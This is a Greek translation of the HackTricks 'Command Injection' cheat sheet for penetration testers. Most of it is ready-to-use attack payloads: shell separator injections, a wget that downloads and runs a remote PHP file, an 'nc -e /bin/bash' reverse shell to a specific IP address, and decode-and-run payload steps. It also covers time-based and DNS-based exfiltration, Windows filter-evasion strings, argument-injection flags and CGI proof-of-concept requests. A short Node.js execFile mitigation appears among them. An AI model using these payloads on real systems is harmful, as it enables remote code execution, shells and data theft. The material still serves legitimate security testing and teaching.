HackTricksCommand Injection
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Τι είναι το command Injection;
Η command injection επιτρέπει την εκτέλεση αυθαίρετων εντολών του λειτουργικού συστήματος από έναν επιτιθέμενο στον server που φιλοξενεί μια εφαρμογή. Ως αποτέλεσμα, η εφαρμογή και όλα τα δεδομένα της μπορούν να παραβιαστούν πλήρως. Η εκτέλεση αυτών των εντολών συνήθως επιτρέπει στον επιτιθέμενο να αποκτήσει μη εξουσιοδοτημένη πρόσβαση ή έλεγχο στο περιβάλλον της εφαρμογής και στο υποκείμενο σύστημα.
Πλαίσιο
Ανάλογα με το πού εισάγεται το input σας ίσως χρειαστεί να τερματίσετε το περιεχόμενο των εισαγωγικών (χρησιμοποιώντας " ή ') πριν από τις εντολές.
Command Injection/Execution
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
Παρακάμψεις Περιορισμών
Αν προσπαθείτε να εκτελέσετε αυθαίρετες εντολές μέσα σε ένα linux μηχάνημα θα σας ενδιαφέρει να διαβάσετε σχετικά με αυτές τις Παρακάμψεις:
Παραδείγματα
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
Παράμετροι
Ακολουθούν οι κορυφαίες 25 παράμετροι που θα μπορούσαν να είναι ευάλωτες σε code injection και παρόμοιες RCE vulnerabilities (από link):
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
Time based data exfiltration
Εξαγωγή δεδομένων: χαρακτήρα προς χαρακτήρα
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
DNS based data exfiltration
Βασίζεται στο εργαλείο από https://github.com/HoLyVieR/dnsbin που φιλοξενείται επίσης στο dnsbin.zhack.ca
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
Διαδικτυακά εργαλεία για έλεγχο της εξαγωγής δεδομένων μέσω DNS:
- dnsbin.zhack.ca
- pingb.in
Παράκαμψη φίλτρων
Windows
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
Linux
Node.js child_process.exec vs execFile
Κατά τον έλεγχο των back-end εφαρμογών σε JavaScript/TypeScript, συχνά θα συναντήσετε το Node.js child_process API.
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});
exec() δημιουργεί ένα shell (/bin/sh -c), επομένως οποιοσδήποτε χαρακτήρας που έχει ειδική σημασία για το shell (back-ticks, ;, &&, |, $(), …) θα οδηγήσει σε command injection όταν η είσοδος του χρήστη συγχωνεύεται στη συμβολοσειρά.
Αντιμετώπιση: χρησιμοποιήστε execFile() (ή spawn() χωρίς την επιλογή shell) και παρέχετε κάθε όρισμα ως ξεχωριστό στοιχείο πίνακα ώστε να μην εμπλέκεται το shell:
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);
Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).
Argument/Option injection via leading hyphen (argv, no shell metacharacters)
Δεν χρειάζονται όλα τα injections shell metacharacters. Εάν η εφαρμογή περνά μη-επαληθευμένες συμβολοσειρές ως arguments σε ένα system utility (ακόμη και με execve/execFile και χωρίς shell), πολλά προγράμματα θα εξακολουθήσουν να ερμηνεύουν οποιοδήποτε argument που ξεκινά με - ή -- ως option. Αυτό επιτρέπει σε έναν attacker να αλλάξει modes, να τροποποιήσει output paths ή να ενεργοποιήσει επικίνδυνες συμπεριφορές χωρίς ποτέ να εισέλθει σε shell.
Τυπικά σημεία όπου αυτό εμφανίζεται:
- Ενσωματωμένα web UIs/CGI handlers που κατασκευάζουν εντολές όπως
ping <user>,tcpdump -i <iface> -w <file>,curl <url>, κ.λπ. - Κεντρικοί CGI routers (π.χ.,
/cgi-bin/<something>.cgiμε παράμετρο selector όπωςtopicurl=<handler>) όπου πολλοί handlers επαναχρησιμοποιούν τον ίδιο αδύναμο validator.
Τι να δοκιμάσετε:
- Παρέχετε τιμές που ξεκινούν με
-/--ώστε να καταναλωθούν ως flags από το downstream tool. - Κακοποιήστε flags που αλλάζουν συμπεριφορά ή γράφουν αρχεία, για παράδειγμα:
ping:-f/-c 100000για να επιβαρύνουν τη συσκευή (DoS)curl:-o /tmp/xγια να γράψετε σε αυθαίρετα paths,-K <url>για να φορτώσετε attacker-controlled configtcpdump:-G 1 -W 1 -z /path/script.shγια να επιτύχετε post-rotate execution σε unsafe wrappers- Εάν το πρόγραμμα υποστηρίζει
--end-of-options, δοκιμάστε να παρακάμψετε naive mitigations που προσθέτουν--στο λάθος σημείο.
Generic PoC shapes against centralized CGI dispatchers:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
# Flip options in a downstream tool via argv injection
topicurl=<handler>¶m=-n
# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;
Brute-Force Λίστα Ανίχνευσης
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
Αναφορές
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
- https://portswigger.net/web-security/os-command-injection
- Extraction of Synology encrypted archives – Synacktiv 2025
- PHP proc_open manual
- HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
- Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
Μάθετε & εξασκηθείτε στο GCP Hacking:Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.